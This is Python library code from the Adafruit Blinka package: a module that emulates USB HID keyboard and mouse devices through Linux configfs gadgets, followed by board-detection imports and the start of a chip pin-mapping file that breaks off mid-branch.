self.in_report_lengths = in_report_lengths
self.report_ids = report_ids
self.usage = usage
self.usage_page = usage_page
self.descriptor = descriptor
self._last_received_report = None
def send_report(self, report: bytearray, report_id: int = None):
"""Send an HID report. If the device descriptor specifies zero or one report id's,
you can supply `None` (the default) as the value of ``report_id``.
Otherwise you must specify which report id to use when sending the report.
"""
report_id = report_id or self.report_ids[0]
device_path = self.get_device_path(report_id)
with open(device_path, "rb+") as fd:
if report_id > 0:
report = bytearray(report_id.to_bytes(1, "big")) + report
fd.write(report)
@property
def last_received_report(
self,
) -> bytes:
"""The HID OUT report as a `bytes` (read-only). `None` if nothing received.
Same as `get_last_received_report()` with no argument.
Deprecated: will be removed in CircutPython 8.0.0. Use `get_last_received_report()` instead.
"""
return self.get_last_received_report()
def get_last_received_report(self, report_id=None) -> bytes:
"""Get the last received HID OUT or feature report for the given report ID.
The report ID may be omitted if there is no report ID, or only one report ID.
Return `None` if nothing received.
"""
device_path = self.get_device_path(report_id or self.report_ids[0])
with open(device_path, "rb+") as fd:
os.set_blocking(fd.fileno(), False)
report = fd.read(self.out_report_lengths[0])
if report is not None:
self._last_received_report = report
return self._last_received_report
def get_device_path(self, report_id):
"""
translates the /dev/hidg device from the report id
"""
device = (
Path(
"%s/functions/hid.usb%s/dev"
% (this.gadget_root, report_id or self.report_ids[0])
)
.read_text(encoding="utf-8")
.strip()
.split(":")[1]
)
device_path = "/dev/hidg%s" % device
return device_path
KEYBOARD = None
MOUSE = None
CONSUMER_CONTROL = None
Device.KEYBOARD = Device(
descriptor=bytes(
(
0x05,
0x01, # usage page (generic desktop ctrls)
0x09,
0x06, # usage (keyboard)
0xA1,
0x01, # collection (application)
0x85,
0x01, # Report ID (1)
0x05,
0x07, # usage page (kbrd/keypad)
0x19,
0xE0, # usage minimum (0xe0)
0x29,
0xE7, # usage maximum (0xe7)
0x15,
0x00, # logical minimum (0)
0x25,
0x01, # logical maximum (1)
0x75,
0x01, # report size (1)
0x95,
0x08, # report count (8)
0x81,
0x02, # input (data,var,abs,no wrap,linear,preferred state,no null position)
0x95,
0x01, # report count (1)
0x75,
0x08, # report size (8)
0x81,
0x01, # input (const,array,abs,no wrap,linear,preferred state,no null position)
0x95,
0x03, # report count (3)
0x75,
0x01, # report size (1)
0x05,
0x08, # usage page (leds)
0x19,
0x01, # usage minimum (num lock)
0x29,
0x05, # usage maximum (kana)
0x91,
0x02, # output
# (data,var,abs,no wrap,linear,preferred state,no null position,non-volatile)
0x95,
0x01, # report count (1)
0x75,
0x05, # report size (5)
0x91,
0x01, # output
# (const,array,abs,no wrap,linear,preferred state,no null position,non-volatile)
0x95,
0x06, # report count (6)
0x75,
0x08, # report size (8)
0x15,
0x00, # logical minimum (0)
0x26,
0xFF,
0x00, # logical maximum (255)
0x05,
0x07, # usage page (kbrd/keypad)
0x19,
0x00, # usage minimum (0x00)
0x2A,
0xFF,
0x00, # usage maximum (0xff)
0x81,
0x00, # input (data,array,abs,no wrap,linear,preferred state,no null position)
0xC0, # end collection
)
),
usage_page=0x1,
usage=0x6,
report_ids=[0x1],
in_report_lengths=[8],
out_report_lengths=[1],
)
Device.MOUSE = Device(
descriptor=bytes(
(
0x05,
0x01, # Usage Page (Generic Desktop Ctrls)
0x09,
0x02, # Usage (Mouse)
0xA1,
0x01, # Collection (Application)
0x85,
0x02, # Report ID (2)
0x09,
0x01, # Usage (Pointer)
0xA1,
0x00, # Collection (Physical)
0x05,
0x09, # Usage Page (Button)
0x19,
0x01, # Usage Minimum (0x01)
0x29,
0x05, # Usage Maximum (0x05)
0x15,
0x00, # Logical Minimum (0)
0x25,
0x01, # Logical Maximum (1)
0x95,
0x05, # Report Count (5)
0x75,
0x01, # Report Size (1)
0x81,
0x02, # Input (Data,Var,Abs,No Wrap,Linear,Preferred State,No Null Position)
0x95,
0x01, # Report Count (1)
0x75,
0x03, # Report Size (3)
0x81,
0x01, # Input (Const,Array,Abs,No Wrap,Linear,Preferred State,No Null Position)
0x05,
0x01, # Usage Page (Generic Desktop Ctrls)
0x09,
0x30, # Usage (X)
0x09,
0x31, # Usage (Y)
0x15,
0x81, # Logical Minimum (-127)
0x25,
0x7F, # Logical Maximum (127)
0x75,
0x08, # Report Size (8)
0x95,
0x02, # Report Count (2)
0x81,
0x06, # Input (Data,Var,Rel,No Wrap,Linear,Preferred State,No Null Position)
0x09,
0x38, # Usage (Wheel)
0x15,
0x81, # Logical Minimum (-127)
0x25,
0x7F, # Logical Maximum (127)
0x75,
0x08, # Report Size (8)
0x95,
0x01, # Report Count (1)
0x81,
0x06, # Input (Data,Var,Rel,No Wrap,Linear,Preferred State,No Null Position)
0xC0, # End Collection
0xC0, # End Collection
)
),
usage_page=0x1,
usage=0x02,
report_ids=[0x02],
in_report_lengths=[4],
out_report_lengths=[0],
)
Device.CONSUMER_CONTROL = Device(
descriptor=bytes(
(
0x05,
0x0C, # Usage Page (Consumer)
0x09,
0x01, # Usage (Consumer Control)
0xA1,
0x01, # Collection (Application)
0x85,
0x03, # Report ID (3)
0x75,
0x10, # Report Size (16)
0x95,
0x01, # Report Count (1)
0x15,
0x01, # Logical Minimum (1)
0x26,
0x8C,
0x02, # Logical Maximum (652)
0x19,
0x01, # Usage Minimum (Consumer Control)
0x2A,
0x8C,
0x02, # Usage Maximum (AC Send)
0x81,
0x00, # Input (Data,Array,Abs,No Wrap,Linear,Preferred State,No Null Position)
0xC0, # End Collection
)
),
usage_page=0x0C,
usage=0x01,
report_ids=[3],
in_report_lengths=[2],
out_report_lengths=[0],
)
Device.BOOT_KEYBOARD = Device(
descriptor=bytes(
(
0x05,
0x01, # usage page (generic desktop ctrls)
0x09,
0x06, # usage (keyboard)
0xA1,
0x01, # collection (application)
0x05,
0x07, # usage page (kbrd/keypad)
0x19,
0xE0, # usage minimum (0xe0)
0x29,
0xE7, # usage maximum (0xe7)
0x15,
0x00, # logical minimum (0)
0x25,
0x01, # logical maximum (1)
0x75,
0x01, # report size (1)
0x95,
0x08, # report count (8)
0x81,
0x02, # input (data,var,abs,no wrap,linear,preferred state,no null position)
0x95,
0x01, # report count (1)
0x75,
0x08, # report size (8)
0x81,
0x01, # input (const,array,abs,no wrap,linear,preferred state,no null position)
0x95,
0x03, # report count (3)
0x75,
0x01, # report size (1)
0x05,
0x08, # usage page (leds)
0x19,
0x01, # usage minimum (num lock)
0x29,
0x05, # usage maximum (kana)
0x91,
0x02, # output
# (data,var,abs,no wrap,linear,preferred state,no null position,non-volatile)
0x95,
0x01, # report count (1)
0x75,
0x05, # report size (5)
0x91,
0x01, # output
# (const,array,abs,no wrap,linear,preferred state,no null position,non-volatile)
0x95,
0x06, # report count (6)
0x75,
0x08, # report size (8)
0x15,
0x00, # logical minimum (0)
0x26,
0xFF,
0x00, # logical maximum (255)
0x05,
0x07, # usage page (kbrd/keypad)
0x19,
0x00, # usage minimum (0x00)
0x2A,
0xFF,
0x00, # usage maximum (0xff)
0x81,
0x00, # input (data,array,abs,no wrap,linear,preferred state,no null position)
0xC0, # end collection
)
),
usage_page=0x1,
usage=0x6,
report_ids=[0x0],
in_report_lengths=[8],
out_report_lengths=[1],
)
Device.BOOT_MOUSE = Device(
descriptor=bytes(
(
0x05,
0x01, # Usage Page (Generic Desktop Ctrls)
0x09,
0x02, # Usage (Mouse)
0xA1,
0x01, # Collection (Application)
0x09,
0x01, # Usage (Pointer)
0xA1,
0x00, # Collection (Physical)
0x05,
0x09, # Usage Page (Button)
0x19,
0x01, # Usage Minimum (0x01)
0x29,
0x05, # Usage Maximum (0x05)
0x15,
0x00, # Logical Minimum (0)
0x25,
0x01, # Logical Maximum (1)
0x95,
0x05, # Report Count (5)
0x75,
0x01, # Report Size (1)
0x81,
0x02, # Input (Data,Var,Abs,No Wrap,Linear,Preferred State,No Null Position)
0x95,
0x01, # Report Count (1)
0x75,
0x03, # Report Size (3)
0x81,
0x01, # Input (Const,Array,Abs,No Wrap,Linear,Preferred State,No Null Position)
0x05,
0x01, # Usage Page (Generic Desktop Ctrls)
0x09,
0x30, # Usage (X)
0x09,
0x31, # Usage (Y)
0x15,
0x81, # Logical Minimum (-127)
0x25,
0x7F, # Logical Maximum (127)
0x75,
0x08, # Report Size (8)
0x95,
0x02, # Report Count (2)
0x81,
0x06, # Input (Data,Var,Rel,No Wrap,Linear,Preferred State,No Null Position)
0x09,
0x38, # Usage (Wheel)
0x15,
0x81, # Logical Minimum (-127)
0x25,
0x7F, # Logical Maximum (127)
0x75,
0x08, # Report Size (8)
0x95,
0x01, # Report Count (1)
0x81,
0x06, # Input (Data,Var,Rel,No Wrap,Linear,Preferred State,No Null Position)
0xC0, # End Collection
0xC0, # End Collection
)
),
usage_page=0x1,
usage=0x02,
report_ids=[0],
in_report_lengths=[4],
out_report_lengths=[0],
)
def disable() -> None:
"""Do not present any USB HID devices to the host computer.
Can be called in ``boot.py``, before USB is connected.
The HID composite device is normally enabled by default,
but on some boards with limited endpoints, including STM32F4,
it is disabled by default. You must turn off another USB device such
as `usb_cdc` or `storage` to free up endpoints for use by `usb_hid`.
"""
try:
Path("%s/UDC" % this.gadget_root).write_text("", encoding="utf-8")
except FileNotFoundError:
pass
for symlink in Path(this.gadget_root).glob("configs/**/hid.usb*"):
symlink.unlink()
for strings_file in Path(this.gadget_root).rglob("configs/*/strings/*/*"):
if strings_file.is_dir():
strings_file.rmdir()
for strings_file in Path(this.gadget_root).rglob("configs/*/strings/*"):
if strings_file.is_dir():
strings_file.rmdir()
for config_dir in Path(this.gadget_root).rglob("configs/*"):
if config_dir.is_dir():
config_dir.rmdir()
for function_dir in Path(this.gadget_root).rglob("functions/*"):
if function_dir.is_dir():
function_dir.rmdir()
try:
Path(this.gadget_root).rmdir()
except FileNotFoundError:
pass
this.devices = []
atexit.register(disable)
def enable(requested_devices: Sequence[Device], boot_device: int = 0) -> None:
"""Specify which USB HID devices that will be available.
Can be called in ``boot.py``, before USB is connected.
:param Sequence devices: `Device` objects.
If `devices` is empty, HID is disabled. The order of the ``Devices``
may matter to the host. For instance, for MacOS, put the mouse device
before any Gamepad or Digitizer HID device or else it will not work.
:param int boot_device: If non-zero, inform the host that support for a
a boot HID device is available.
If ``boot_device=1``, a boot keyboard is available.
If ``boot_device=2``, a boot mouse is available. No other values are allowed.
See below.
If you enable too many devices at once, you will run out of USB endpoints.
The number of available endpoints varies by microcontroller.
CircuitPython will go into safe mode after running ``boot.py`` to inform you if
not enough endpoints are available.
**Boot Devices**
Boot devices implement a fixed, predefined report descriptor, defined in
https://www.usb.org/sites/default/files/hid1_12.pdf, Appendix B. A USB host
can request to use the boot device if the USB device says it is available.
Usually only a BIOS or other kind of limited-functionality
host needs boot keyboard support.
For example, to make a boot keyboard available, you can use this code::
usb_hid.enable((Device.KEYBOARD), boot_device=1) # 1 for a keyboard
If the host requests the boot keyboard, the report descriptor provided by `Device.KEYBOARD`
will be ignored, and the predefined report descriptor will be used.
But if the host does not request the boot keyboard,
the descriptor provided by `Device.KEYBOARD` will be used.
The HID boot device must usually be the first or only device presented by CircuitPython.
The HID device will be USB interface number 0.
To make sure it is the first device, disable other USB devices, including CDC and MSC
(CIRCUITPY).
If you specify a non-zero ``boot_device``, and it is not the first device, CircuitPython
will enter safe mode to report this error.
"""
this.boot_device = boot_device
if len(requested_devices) == 0:
disable()
return
if boot_device == 1:
requested_devices = [Device.BOOT_KEYBOARD]
if boot_device == 2:
requested_devices = [Device.BOOT_MOUSE]
# """
# 1. Creating the gadgets
# -----------------------
#
# For each gadget to be created its corresponding directory must be created::
#
# $ mkdir $CONFIGFS_HOME/usb_gadget/<gadget name>
#
# e.g.::
#
# $ mkdir $CONFIGFS_HOME/usb_gadget/g1
#
# ...
# ...
# ...
#
# $ cd $CONFIGFS_HOME/usb_gadget/g1
#
# Each gadget needs to have its vendor id <VID> and product id <PID> specified::
#
# $ echo <VID> > idVendor
# $ echo <PID> > idProduct
#
# A gadget also needs its serial number, manufacturer and product strings.
# In order to have a place to store them, a strings subdirectory must be created
# for each language, e.g.::
#
# $ mkdir strings/0x409
#
# Then the strings can be specified::
#
# $ echo <serial number> > strings/0x409/serialnumber
# $ echo <manufacturer> > strings/0x409/manufacturer
# $ echo <product> > strings/0x409/product
# """
Path("%s/functions" % this.gadget_root).mkdir(parents=True, exist_ok=True)
Path("%s/configs" % this.gadget_root).mkdir(parents=True, exist_ok=True)
Path("%s/bcdDevice" % this.gadget_root).write_text(
"%s" % 1, encoding="utf-8"
) # Version 1.0.0
Path("%s/bcdUSB" % this.gadget_root).write_text(
"%s" % 0x0200, encoding="utf-8"
) # USB 2.0
Path("%s/bDeviceClass" % this.gadget_root).write_text(
"%s" % 0x00, encoding="utf-8"
) # multipurpose i guess?
Path("%s/bDeviceProtocol" % this.gadget_root).write_text(
"%s" % 0x00, encoding="utf-8"
)
Path("%s/bDeviceSubClass" % this.gadget_root).write_text(
"%s" % 0x00, encoding="utf-8"
)
Path("%s/bMaxPacketSize0" % this.gadget_root).write_text(
"%s" % 0x08, encoding="utf-8"
)
Path("%s/idProduct" % this.gadget_root).write_text(
"%s" % 0x0104, encoding="utf-8"
) # Multifunction Composite Gadget
Path("%s/idVendor" % this.gadget_root).write_text(
"%s" % 0x1D6B, encoding="utf-8"
) # Linux Foundation
# """
# 2. Creating the configurations
# ------------------------------
#
# Each gadget will consist of a number of configurations, their corresponding
# directories must be created:
#
# $ mkdir configs/<name>.<number>
#
# where <name> can be any string which is legal in a filesystem and the
# <number> is the configuration's number, e.g.::
#
# $ mkdir configs/c.1
#
# ...
# ...
# ...
#
# Each configuration also needs its strings, so a subdirectory must be created
# for each language, e.g.::
#
# $ mkdir configs/c.1/strings/0x409
#
# Then the configuration string can be specified::
#
# $ echo <configuration> > configs/c.1/strings/0x409/configuration
#
# Some attributes can also be set for a configuration, e.g.::
#
# $ echo 120 > configs/c.1/MaxPower
# """
for device in requested_devices:
config_root = "%s/configs/device.1" % this.gadget_root
Path("%s/" % config_root).mkdir(parents=True, exist_ok=True)
Path("%s/strings/0x409" % config_root).mkdir(parents=True, exist_ok=True)
Path("%s/strings/0x409/configuration" % config_root).write_text(
"my configuration", encoding="utf-8"
)
Path("%s/MaxPower" % config_root).write_text("150", encoding="utf-8")
Path("%s/bmAttributes" % config_root).write_text("%s" % 0x080, encoding="utf-8")
this.devices.append(device)
# """
# 3. Creating the functions
# -------------------------
#
# The gadget will provide some functions, for each function its corresponding
# directory must be created::
#
# $ mkdir functions/<name>.<instance name>
#
# where <name> corresponds to one of allowed function names and instance name
# is an arbitrary string allowed in a filesystem, e.g.::
#
# $ mkdir functions/ncm.usb0 # usb_f_ncm.ko gets loaded with request_module()
#
# ...
# ...
# ...
#
# Each function provides its specific set of attributes, with either read-only
# or read-write access. Where applicable they need to be written to as
# appropriate.
# Please refer to Documentation/ABI/*/configfs-usb-gadget* for more information. """
for report_index, report_id in enumerate(device.report_ids):
function_root = "%s/functions/hid.usb%s" % (this.gadget_root, report_id)
try:
Path("%s/" % function_root).mkdir(parents=True)
except FileExistsError:
continue
Path("%s/protocol" % function_root).write_text(
"%s" % report_id, encoding="utf-8"
)
Path("%s/report_length" % function_root).write_text(
"%s" % device.in_report_lengths[report_index], encoding="utf-8"
)
Path("%s/subclass" % function_root).write_text("%s" % 1, encoding="utf-8")
Path("%s/report_desc" % function_root).write_bytes(device.descriptor)
# """
# 4. Associating the functions with their configurations
# ------------------------------------------------------
#
# At this moment a number of gadgets is created, each of which has a number of
# configurations specified and a number of functions available. What remains
# is specifying which function is available in which configuration (the same
# function can be used in multiple configurations). This is achieved with
# creating symbolic links::
#
# $ ln -s functions/<name>.<instance name> configs/<name>.<number>
#
# e.g.::
#
# $ ln -s functions/ncm.usb0 configs/c.1 """
try:
Path("%s/hid.usb%s" % (config_root, report_id)).symlink_to(
function_root
)
except FileNotFoundError:
pass
# """ 5. Enabling the gadget
# ----------------------
# Such a gadget must be finally enabled so that the USB host can enumerate it.
#
# In order to enable the gadget it must be bound to a UDC (USB Device
# Controller)::
#
# $ echo <udc name> > UDC
#
# where <udc name> is one of those found in /sys/class/udc/*
# e.g.::
#
# $ echo s3c-hsotg > UDC """
udc = next(Path("/sys/class/udc/").glob("*"))
Path("%s/UDC" % this.gadget_root).write_text("%s" % udc.name, encoding="utf-8") | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/usb_hid.py | usb_hid.py |
__version__ = "8.20.1"
__repo__ = "https://github.com/adafruit/Adafruit_Blinka.git"
__blinka__ = True
import sys
import adafruit_platformdetect.constants.boards as ap_board
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=wildcard-import,unused-wildcard-import,ungrouped-imports
# pylint: disable=import-outside-toplevel
if board_id == ap_board.FEATHER_HUZZAH:
from adafruit_blinka.board.feather_huzzah import *
elif board_id == ap_board.NODEMCU:
from adafruit_blinka.board.nodemcu import *
elif board_id == ap_board.PYBOARD:
from adafruit_blinka.board.pyboard import *
elif board_id == ap_board.RASPBERRY_PI_PICO:
from adafruit_blinka.board.raspberrypi.pico import *
elif (
detector.board.RASPBERRY_PI_4B
or detector.board.RASPBERRY_PI_CM4
or detector.board.RASPBERRY_PI_400
):
from adafruit_blinka.board.raspberrypi.raspi_4b import *
elif detector.board.any_raspberry_pi_40_pin:
from adafruit_blinka.board.raspberrypi.raspi_40pin import *
elif detector.board.any_raspberry_pi_cm:
from adafruit_blinka.board.raspberrypi.raspi_cm import *
elif detector.board.RASPBERRY_PI_B_REV1:
from adafruit_blinka.board.raspberrypi.raspi_1b_rev1 import *
elif detector.board.RASPBERRY_PI_A or detector.board.RASPBERRY_PI_B_REV2:
from adafruit_blinka.board.raspberrypi.raspi_1b_rev2 import *
elif board_id == ap_board.BEAGLEBONE:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLUE:
from adafruit_blinka.board.beagleboard.beaglebone_blue import *
elif board_id == ap_board.BEAGLEBONE_GREEN:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_GREEN_GATEWAY:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK_INDUSTRIAL:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_GREEN_WIRELESS:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK_WIRELESS:
from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_POCKETBEAGLE:
from adafruit_blinka.board.beagleboard.beaglebone_pocketbeagle import *
elif board_id == ap_board.BEAGLEBONE_AI:
from adafruit_blinka.board.beagleboard.beaglebone_ai import *
elif board_id == ap_board.BEAGLEV_STARLIGHT:
from adafruit_blinka.board.beagleboard.beaglev_starlight import *
elif board_id == ap_board.ORANGE_PI_PC:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_R1:
from adafruit_blinka.board.orangepi.orangepir1 import *
elif board_id == ap_board.ORANGE_PI_ZERO:
from adafruit_blinka.board.orangepi.orangepizero import *
elif board_id == ap_board.ORANGE_PI_ONE:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_PC_PLUS:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_LITE:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_PLUS_2E:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_2:
from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_ZERO_PLUS_2H5:
from adafruit_blinka.board.orangepi.orangepizeroplus2h5 import *
elif board_id == ap_board.ORANGE_PI_ZERO_PLUS:
from adafruit_blinka.board.orangepi.orangepizeroplus import *
elif board_id == ap_board.ORANGE_PI_ZERO_2:
from adafruit_blinka.board.orangepi.orangepizero2 import *
elif board_id == ap_board.ORANGE_PI_3:
from adafruit_blinka.board.orangepi.orangepi3 import *
elif board_id == ap_board.ORANGE_PI_4:
from adafruit_blinka.board.orangepi.orangepi4 import *
elif board_id == ap_board.ORANGE_PI_4_LTS:
from adafruit_blinka.board.orangepi.orangepi4 import *
elif board_id == ap_board.ORANGE_PI_5:
from adafruit_blinka.board.orangepi.orangepi5 import *
elif board_id == ap_board.BANANA_PI_M2_ZERO:
from adafruit_blinka.board.bananapi.bpim2zero import *
elif board_id == ap_board.BANANA_PI_M2_PLUS:
from adafruit_blinka.board.bananapi.bpim2plus import *
elif board_id == ap_board.BANANA_PI_M5:
from adafruit_blinka.board.bananapi.bpim5 import *
elif board_id == ap_board.GIANT_BOARD:
from adafruit_blinka.board.giantboard import *
elif board_id == ap_board.JETSON_TX1:
from adafruit_blinka.board.nvidia.jetson_tx1 import *
elif board_id == ap_board.JETSON_TX2:
from adafruit_blinka.board.nvidia.jetson_tx2 import *
elif board_id == ap_board.JETSON_TX2_NX:
from adafruit_blinka.board.nvidia.jetson_tx2_nx import *
elif board_id == ap_board.JETSON_XAVIER:
from adafruit_blinka.board.nvidia.jetson_xavier import *
elif board_id == ap_board.JETSON_NANO:
from adafruit_blinka.board.nvidia.jetson_nano import *
elif board_id == ap_board.JETSON_NX:
from adafruit_blinka.board.nvidia.jetson_nx import *
elif board_id == ap_board.JETSON_AGX_ORIN:
from adafruit_blinka.board.nvidia.jetson_orin import *
elif board_id in (ap_board.JETSON_ORIN_NX, ap_board.JETSON_ORIN_NANO):
from adafruit_blinka.board.nvidia.jetson_orin_nx import *
elif board_id == ap_board.CLARA_AGX_XAVIER:
from adafruit_blinka.board.nvidia.clara_agx_xavier import *
elif board_id == ap_board.CORAL_EDGE_TPU_DEV:
from adafruit_blinka.board.coral_dev_board import *
elif board_id == ap_board.CORAL_EDGE_TPU_DEV_MINI:
from adafruit_blinka.board.coral_dev_board_mini import *
elif board_id == ap_board.ODROID_C2:
from adafruit_blinka.board.hardkernel.odroidc2 import *
elif board_id == ap_board.ODROID_C4:
from adafruit_blinka.board.hardkernel.odroidc4 import *
elif board_id == ap_board.ODROID_N2:
from adafruit_blinka.board.hardkernel.odroidn2 import *
elif board_id == ap_board.ODROID_M1:
from adafruit_blinka.board.hardkernel.odroidm1 import *
elif board_id == ap_board.KHADAS_VIM3:
from adafruit_blinka.board.khadas.khadasvim3 import *
elif board_id == ap_board.ODROID_XU4:
from adafruit_blinka.board.hardkernel.odroidxu4 import *
elif board_id == ap_board.DRAGONBOARD_410C:
from adafruit_blinka.board.dragonboard_410c import *
elif board_id == ap_board.FTDI_FT232H:
from adafruit_blinka.board.ftdi_ft232h import *
elif board_id == ap_board.FTDI_FT2232H:
from adafruit_blinka.board.ftdi_ft2232h import *
elif board_id == ap_board.BINHO_NOVA:
from adafruit_blinka.board.binho_nova import *
elif board_id == ap_board.MICROCHIP_MCP2221:
from adafruit_blinka.board.microchip_mcp2221 import *
elif board_id == ap_board.GREATFET_ONE:
from adafruit_blinka.board.greatfet_one import *
elif board_id == ap_board.SIFIVE_UNLEASHED:
from adafruit_blinka.board.hifive_unleashed import *
elif board_id == ap_board.PINE64:
from adafruit_blinka.board.pine64 import *
elif board_id == ap_board.PINEH64:
from adafruit_blinka.board.pineH64 import *
elif board_id == ap_board.SOPINE:
from adafruit_blinka.board.soPine import *
elif board_id == ap_board.CLOCKWORK_CPI3:
from adafruit_blinka.board.clockworkcpi3 import *
elif board_id == ap_board.ONION_OMEGA2:
from adafruit_blinka.board.onion.omega2 import *
elif board_id == ap_board.RADXA_CM3:
from adafruit_blinka.board.radxa.radxacm3 import *
elif board_id == ap_board.ROCK_PI_3A:
from adafruit_blinka.board.radxa.rockpi3a import *
elif board_id == ap_board.RADXA_ZERO:
from adafruit_blinka.board.radxa.radxazero import *
elif board_id == ap_board.ROCK_PI_S:
from adafruit_blinka.board.radxa.rockpis import *
elif board_id == ap_board.ROCK_PI_4:
from adafruit_blinka.board.radxa.rockpi4 import *
elif board_id == ap_board.ROCK_PI_4_C_PLUS:
from adafruit_blinka.board.radxa.rockpi4 import *
elif board_id == ap_board.ROCK_PI_5:
from adafruit_blinka.board.radxa.rock5 import *
elif board_id == ap_board.ROCK_PI_E:
from adafruit_blinka.board.radxa.rockpie import *
elif board_id == ap_board.UDOO_X86:
from adafruit_blinka.board.udoo_x86ultra import *
elif board_id == ap_board.ODYSSEY_X86J41X5:
from adafruit_blinka.board.x86j41x5 import *
elif board_id == ap_board.STM32MP157C_DK2:
from adafruit_blinka.board.stm32.stm32mp157c_dk2 import *
elif board_id == ap_board.OSD32MP1_RED:
from adafruit_blinka.board.stm32.osd32mp1_red import *
elif board_id == ap_board.OSD32MP1_BRK:
from adafruit_blinka.board.stm32.osd32mp1_brk import *
elif board_id == ap_board.LUBANCAT_IMX6ULL:
from adafruit_blinka.board.lubancat.lubancat_imx6ull import *
elif board_id == ap_board.LUBANCAT_STM32MP157:
from adafruit_blinka.board.lubancat.lubancat_stm32mp157 import *
elif board_id == ap_board.LUBANCAT_ZERO:
from adafruit_blinka.board.lubancat.lubancat_zero import *
elif board_id == ap_board.LUBANCAT1:
from adafruit_blinka.board.lubancat.lubancat1 import *
elif board_id == ap_board.LUBANCAT2:
from adafruit_blinka.board.lubancat.lubancat2 import *
elif board_id == ap_board.NANOPI_NEO_AIR:
from adafruit_blinka.board.nanopi.neoair import *
elif board_id == ap_board.NANOPI_DUO2:
from adafruit_blinka.board.nanopi.duo2 import *
elif board_id == ap_board.NANOPI_NEO:
from adafruit_blinka.board.nanopi.neo import *
elif board_id == ap_board.PICO_U2IF:
from adafruit_blinka.board.pico_u2if import *
elif board_id == ap_board.FEATHER_U2IF:
from adafruit_blinka.board.feather_u2if import *
elif board_id == ap_board.FEATHER_CAN_U2IF:
from adafruit_blinka.board.feather_can_u2if import *
elif board_id == ap_board.FEATHER_EPD_U2IF:
from adafruit_blinka.board.feather_epd_u2if import *
elif board_id == ap_board.FEATHER_RFM_U2IF:
from adafruit_blinka.board.feather_rfm_u2if import *
elif board_id == ap_board.QTPY_U2IF:
from adafruit_blinka.board.qtpy_u2if import *
elif board_id == ap_board.ITSYBITSY_U2IF:
from adafruit_blinka.board.itsybitsy_u2if import *
elif board_id == ap_board.MACROPAD_U2IF:
from adafruit_blinka.board.macropad_u2if import *
elif board_id == ap_board.QT2040_TRINKEY_U2IF:
from adafruit_blinka.board.qt2040_trinkey_u2if import *
elif board_id == ap_board.KB2040_U2IF:
from adafruit_blinka.board.kb2040_u2if import *
elif board_id == ap_board.LICHEE_RV:
from adafruit_blinka.board.lichee_rv import *
elif board_id == ap_board.SIEMENS_SIMATIC_IOT2050_ADV:
from adafruit_blinka.board.siemens.siemens_iot2050 import *
elif board_id == ap_board.SIEMENS_SIMATIC_IOT2050_BASIC:
from adafruit_blinka.board.siemens.siemens_iot2050 import *
elif board_id == ap_board.AML_S905X_CC:
from adafruit_blinka.board.librecomputer.aml_s905x_cc_v1 import *
elif board_id == ap_board.ROC_RK3328_CC:
from adafruit_blinka.board.librecomputer.roc_rk3328_cc import *
elif board_id == ap_board.GENERIC_LINUX_PC:
from adafruit_blinka.board.generic_linux_pc import *
elif "sphinx" in sys.modules:
pass
elif board_id is None:
import platform
import pkg_resources
package = str(pkg_resources.get_distribution("adafruit_platformdetect")).split()
raise NotImplementedError(
f"""
{package[0]} version {package[1]} was unable to identify the board and/or
microcontroller running the {platform.system()} platform. Please be sure you
have the latest packages running:
'pip3 install --upgrade adafruit-blinka adafruit-platformdetect'
"""
)
else:
raise NotImplementedError(f"Board not supported {board_id}.")
if "SCL" in locals() and "SDA" in locals():
def I2C():
"""The singleton I2C interface"""
import busio
return busio.I2C(SCL, SDA)
if "SCLK" in locals() and "MOSI" in locals() and "MISO" in locals():
def SPI():
"""The singleton SPI interface"""
import busio
return busio.SPI(SCLK, MOSI, MISO) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/board.py | board.py |
"""Pins named after their chip name."""
import sys
from adafruit_platformdetect.constants import chips as ap_chip
from adafruit_blinka.agnostic import board_id, chip_id
# We intentionally are patching into this namespace so skip the wildcard check.
# pylint: disable=unused-wildcard-import,wildcard-import,ungrouped-imports
if chip_id == ap_chip.ESP8266:
from adafruit_blinka.microcontroller.esp8266.pin import *
elif chip_id == ap_chip.STM32F405:
from adafruit_blinka.microcontroller.stm32.stm32f405.pin import *
elif chip_id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040.pin import *
elif chip_id == ap_chip.BCM2XXX:
if board_id in [
"RASPBERRY_PI_4B",
"RASPBERRY_PI_400",
"RASPBERRY_PI_CM4",
]:
from adafruit_blinka.microcontroller.bcm2711.pin import *
else:
from adafruit_blinka.microcontroller.bcm283x.pin import *
elif chip_id == ap_chip.DRA74X:
from adafruit_blinka.microcontroller.dra74x.pin import *
elif chip_id == ap_chip.AM33XX:
from adafruit_blinka.microcontroller.am335x.pin import *
elif chip_id == ap_chip.AM65XX:
from adafruit_blinka.microcontroller.am65xx.pin import *
elif chip_id == ap_chip.JH71x0:
from adafruit_blinka.microcontroller.starfive.JH71x0.pin import *
elif chip_id == ap_chip.SUN8I:
from adafruit_blinka.microcontroller.allwinner.h3.pin import *
elif chip_id == ap_chip.H3:
from adafruit_blinka.microcontroller.allwinner.h3.pin import *
elif chip_id == ap_chip.H5:
from adafruit_blinka.microcontroller.allwinner.h5.pin import *
elif chip_id == ap_chip.H6:
from adafruit_blinka.microcontroller.allwinner.h6.pin import *
elif chip_id == ap_chip.H616:
